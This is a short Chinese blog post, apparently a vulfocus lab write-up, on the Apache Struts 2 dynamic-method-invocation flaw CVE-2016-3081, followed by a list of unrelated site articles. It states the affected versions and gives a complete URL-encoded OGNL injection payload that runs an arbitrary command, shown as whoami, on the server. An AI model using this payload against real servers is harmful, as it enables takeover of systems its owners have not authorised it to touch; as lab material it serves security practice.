vulfocus靶场struts2 命令执行 CVE-2016-3081

  • 开发
  • 13

远程攻击者利用漏洞可在开启动态方法调用功能Apache Struts 2服务器上执行任意代码,取得网站服务器控制权。

影响版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)

工具利用:

struts2 综合利用工具:

http://ip:port/index.action? 后面接payload

payload: 红色部分为可替换的执行命令

method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=whoami

加上payload后:

阅读全部

相关推荐

最近更新

  4. TCP协议是安全的吗?

    2024-04-24 19:38:01       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-24 19:38:01       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-04-24 19:38:01       18 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-04-24 19:38:01       20 阅读

热门阅读

  1. 京东商品详情API:电商创新的利器

    2024-04-24 19:38:01       12 阅读

  7. 《深入浅出.NET框架设计与实现》笔记1——.NET CLI 概述

    2024-04-24 19:38:01       10 阅读

  8. L2-3 满树的遍历

    2024-04-24 19:38:01       10 阅读

  9. 2024年货运从业资格考试题库及答案

    2024-04-24 19:38:01       19 阅读

  10. PHP中的会话管理是如何工作的?

    2024-04-24 19:38:01       9 阅读

  11. base上海,数据科学,数据挖掘,数据分析等岗位,求推荐求收留

    2024-04-24 19:38:01       15 阅读

  15. 如何防止SQL注入攻击?

    2024-04-24 19:38:01       19 阅读

  19. 2024年最重要的AI趋势

    2024-04-24 19:38:01       12 阅读

  21. 【Linux】解决切换用户出现bash-4.2$问题

    2024-04-24 19:38:01       11 阅读

  23. 网络安全之数据库基础篇(基础入门)

    2024-04-24 19:38:01       14 阅读

  26. js 制作qq、微信 的表情

    2024-04-24 19:38:01       13 阅读

  29. 【PyTorch】3-基础实战(ResNet)

    2024-04-24 19:38:01       10 阅读